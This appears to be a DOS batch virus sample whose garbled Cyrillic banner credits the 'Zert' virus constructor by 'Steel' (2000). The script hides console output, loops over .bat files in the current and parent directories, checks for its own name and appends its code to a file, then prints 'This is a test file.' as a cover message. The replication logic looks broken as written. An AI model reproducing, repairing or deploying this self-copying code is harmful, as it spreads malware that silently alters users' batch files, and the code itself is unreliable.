:<<<< ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ >>>>
:<<<< ³   â®â ä ©« á®§¤ ­ Zert ª®­áâàãªâ®à®¬!   ³ >>>>
:<<<< ³             ver 1.0 by Steel.            ³ >>>>
:<<<< ³    Zert ­ ¯¨á ­ ¢ ®áá¨¨ ¢ 2000 £®¤ã     ³ >>>>
:<<<< ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ >>>>
@ctty nul
if "%0"=="AUTOEXEC.BAT" exit
attrib %0 +r
for %%w in (*.bat ..\*.bat) do set Muha =%%w
attrib %0 -r
for %%q in (%0) do find "%0" %%q
if not errorlevel 1 goto ok
type %0 >> %0
goto ok
:ok
attrib %0 -r
@ctty con
Echo This is a test file.
